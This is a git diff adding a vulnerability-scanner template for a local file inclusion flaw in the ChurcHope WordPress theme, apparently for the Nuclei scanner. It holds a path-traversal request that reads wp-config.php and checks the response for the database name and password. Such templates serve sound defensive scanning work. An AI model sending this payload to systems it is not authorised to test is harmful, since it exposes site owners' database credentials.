diff --git a/vulnerabilities/wordpress/churchope-application-lfi.yaml b/vulnerabilities/wordpress/churchope-application-lfi.yaml
new file mode 100644
index 0000000000..a09be16d82
--- /dev/null
+++ b/vulnerabilities/wordpress/churchope-application-lfi.yaml
@@ -0,0 +1,28 @@
+id: churchope-application-lfi
+
+info:
+  name: ChurcHope Theme <= 2.1 - Local File Inclusion (LFI)
+  author: dhiyaneshDK
+  severity: high
+  description: The vulnerability is caused by improper filtration of user-supplied input passed via the 'file' HTTP GET parameter to the '/lib/downloadlink.php' script, which is publicly accessible.
+  reference:
+    - https://wpscan.com/vulnerability/3c5833bd-1fe0-4eba-97aa-7d3a0c8fda15
+  tags: wordpress,wp-plugin,lfi
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "DB_NAME"
+          - "DB_PASSWORD"
+        part: body
+        condition: and
+
+      - type: status
+        status:
+          - 200